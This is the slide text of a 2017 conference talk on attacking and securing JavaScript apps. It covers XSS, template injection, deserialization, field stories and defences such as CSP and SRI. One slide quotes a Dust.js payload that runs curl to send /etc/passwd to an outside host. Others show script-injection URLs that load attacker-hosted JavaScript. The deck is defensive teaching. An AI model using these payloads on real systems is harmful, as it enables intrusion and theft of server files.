Upgrade to Pro — share decks privately, control downloads, hide ads and more …


September 15, 2017



September 15, 2017

More Decks by riyazwalikar

Other Decks in Technology


  1. ▪ Pragmatic, holistic, business-focused approach ▪ Specialist Application Security company

    ▪ Highly experienced and diverse team ▪ Commercial ▪ Security; Gold Standards About Appsecco Def Con speakers Assigned multiple CVEs Certified Hackers OWASP chapter leads
  2. Appsecco Security Clinic • This talk (here) • Curated Q&A

    + Birds of a Feather discussion (Banquet Hall)
  3. $("input[name='Riyaz Walikar']") • Chief Attacker at Appsecco • Several years

    of experience in breaking stuff (Offensive Security) • All kinds of things (applications/mobile/systems/networks/wireless) • New to JavaScript Frameworks and Libraries
  4. What will we look at today? • What do attackers

    target when attacking JS apps? • Publicly disclosed security weaknesses in frameworks/libraries/apps • Client side security weaknesses • Server side security weaknesses • Stories from the field • Impact of exploitation – Demos ☺ • A brief overview of Content Security Policy • Using Subresource Integrity • Additional Security Headers
  5. When looking at JS Apps • Identification of the framework/libraries

    • Previously discovered security issues, bypasses, feature abuses • Sources (eg: <input>) and Sinks (eg: .innerHTML) for user supplied data • Error messages and stack traces / Console logging • Client side dynamic and hardcoded variables/tokens/secrets/keys • Communication channels like websockets, webRTC etc.
  6. Client Side Weaknesses • Mavo and DOM based XSS •

    Angular and Template Injection • Script Injection in MDWiki
  7. Mavo and DOM based XSS • Abusing the $url object

    ($url.queryparam) <a href="{$url.spec}" mv-attribute="null"></a> /?spec=test
  8. Angular JS & (Expression) Template Injection • Templating can be

    tricky {{}} • Uber no quotes bug! (Shouts to @portswigger and @0x6d6172696f) • Server did not allow quotes, but Angular was present (templating?) • Angular 1.2.0 which bans accessing constructor via a regular javascript property like obj.constructor • Final exploit obtained the string “constructor” from multiple literals and created a Angular template
  9. XSS in MDWiki • MDWiki allows markdown files to be

    loaded using URI fragments • http://example.com/#!index.md • The code did a xhr to location.hash.split('#!')[1] • Exploit? /#!https://x41.co/mdxss.php
  10. Server Side Weaknesses • Node.js (Dust.js) user input eval •

    Server Side Template Injection in Jade • Node.js unserialize() code execution
  11. Node.js (Dust.js) user input eval • Found on a PayPal

    subdomain by Michael Stepankin (@artsploit) • Dust.js is a JS templating engine for Node • Dust.js used ‘if helper’ – Removed in 1.6.0 release http://demo.paypal.com/us/demo/navigation?device=desktop
  12. Node.js (Dust.js) user input eval • Send array instead of

    string to bypass filters • Parsed by the qs module • Final payload https://_demo.paypal.com/demo/navigation?device[]=x&device[]=y'- require('child_process').exec('curl+- F+"x=`cat+/etc/passwd`"+artsploit.com')-'
  13. Server Side Template Injection in Jade (Pug) • Jade (renamed

    to Pug now) is a templating engine for Node • This is not a vulnerability in itself but an example of how templating can lead to code execution if user input is not properly sanitized • The example is using CodePen.io • No vulnerability in CodePen or Jade itself • Example of feature abuse based on the context and implementation
  14. Node.js unserialize() code execution • Discovered during a Node.js code

    review by Ajin, a fellow security community researcher • User’s cookie was sent to the unserialize() function of the node- serialize module. Internally uses eval() for deserialization • Passing untrusted client sent data to unserialize can result in code execution on the server - CVE-2017-5941
  15. Tell me your secret • Very large client in the

    financial sector • Using a React app to deliver UI. JSON authenticated endpoints populated the data • The password was encrypted using a static key before being sent to the server and presumably decrypted on the server for verification • The key and IV was stored in plaintext in a convoluted mass of client side JS
  16. Tell me your secret • The client was reusing the

    same crypto components on multiple sites • Leaking the key and IV would allow decryption on the client side possible • A data breach leaking encrypted credentials would massively hurt the client more so because it would be possible to decrypt the credentials
  17. Typo & and a ClickJacking attack • Very large client

    in the financial sector • Resource heavy JS framework • Had the X-Frame-Options header set to prevent ClickJacking attacks • However, Burpsuite kept complaining that the site was vulnerable • Investigation revealed a typo in the header
  18. Typo & and a ClickJacking attack • Allowed us to

    iframe the site and create a PoC for phishing attacks • The fix was as simple as removing the space before the header
  19. Script Injection due to a weak regex • Large customer

    in the automobile industry • Blog had functionality to load pages from the webroot directory • Site was loading pages via XHR requests http://example.com/#register • Cross site requests were being prevented using a regex check
  20. Script Injection due to a weak regex http://client-domain/#http://attacker-ip/a.js?client-domain • Successful

    XSS exploitation led to compromising a higher privileged account • Obtained full access to the client’s data
  21. Content Security Policy • Content-Security-Policy HTTP response header helps you

    reduce XSS risks on modern browsers by declaring what dynamic resources are allowed to load via a HTTP Header.
  22. Directives default-src script-src style-src img-src connect-src font-src object-src media-src frame-src

    sandbox report-uri child-src form-action frame-ancestors plugin-types require-sri-for
  23. How does a policy look like? default-src 'none'; script-src 'self';

    connect-src 'self'; img-src 'self'; style- src 'self';
  24. CSP Reporting • report-uri directive enables reporting • Violation reports

    are sent as a JSON POST request to the URI in the header
  25. SRI – What is? • Subresource Integrity (SRI) is a

    security feature that enables browsers to verify that files they fetch (for example, from a CDN) are delivered without unexpected manipulation. • It works by allowing you to provide a cryptographic hash that a fetched file must match. • Why?
  26. How to generate? cat FILENAME.js | openssl dgst -sha384 -binary

    | openssl enc -base64 –A shasum -b -a 384 FILENAME.js | xxd -r -p | base64
  27. X-Content-Type-Options • The x-content-type header prevents Internet Explorer and Google

    Chrome from sniffing a response away from the declared content- type.
  28. Building Secure Stuff – Where to start? • The OWASP

    Project • OWASP ASVS • OWASP Top 10 • OWASP Testers Guide • Security documentation for the framework/library that is being used • Think like a potential attacker • Attack surface? • What are the assumptions in the system?
  29. So when looking at JS Apps • Identification of the

    framework/libraries • Previously discovered security issues, bypasses, feature abuses • Sources and Sinks for user supplied data • Endpoints discoverable through JS code • Error messages and stack traces • Console logging • Client side dynamic and hardcoded variables/tokens/secrets/keys • Browser Storage mechanisms • Cross origin communication using postMessage, widgets, CORS • External sources of js/css/images/fonts • Communication protocols like websockets, webRTC etc.
  30. Content References • https://github.com/jquery/jquery/issues/2432 • https://github.com/cure53/mustache-security/tree/master/wiki • http://blog.portswigger.net/2016/04/adapting-angularjs-payloads-to-exploit.html • http://blog.portswigger.net/2017/09/abusing-javascript-frameworks-to-bypass.html

    • http://www.ccs.neu.edu/home/arshad/publications/ndss2017jslibs.pdf • http://www.levigross.com/2014/06/11/how-to-find-xss-in-knockout.js-applications/ • https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ • http://blog.portswigger.net/2015/08/server-side-template-injection.html • http://artsploit.blogspot.in/2016/08/pprce2.html • https://blog.appsecco.com/nodejs-and-a-simple-rce-exploit-d79001837cc6 • https://en.wikipedia.org/wiki/Immediately-invoked_function_expression • https://content-security-policy.com/ • https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy • https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP#Enabling_reporting • https://developer.moilla.org/en-US/docs/Web/Security/Subresource_Integrity • https://www.keycdn.com/blog/http-security-headers/